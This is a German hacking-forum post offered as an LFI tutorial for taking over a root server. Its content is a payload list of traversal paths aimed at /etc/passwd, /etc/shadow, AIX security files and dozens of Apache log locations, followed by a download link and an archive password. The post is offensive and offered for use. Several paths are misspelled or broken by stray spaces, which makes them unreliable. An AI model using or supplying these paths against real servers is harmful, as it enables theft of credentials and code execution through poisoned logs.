Hallo Leute,
in diesem Tutorial zeige ich euch wie man mit Hilfe einer LFI Luecke einen Root Server "hacken"/"securen" kann.
Naya wie gesagt eine bisher nicht alt zu bekannte Methode, ueber ein "Dankeschoen" oder bzw. Kritik/Verbesserungsvorschlaege wuerde ich mich freuen
Code:
Pfade, die für eine Local/Remote Inclusion relevant sein können:
(Unix Benutzer- und Passwortfiles.)
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
(Apache Error Log Pfade
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Download: K L i C K E N !
Passwort: free-hack.com&src
Mit freundlichem Gruß
kRoLLe13 aKa hAgBaRd2ooo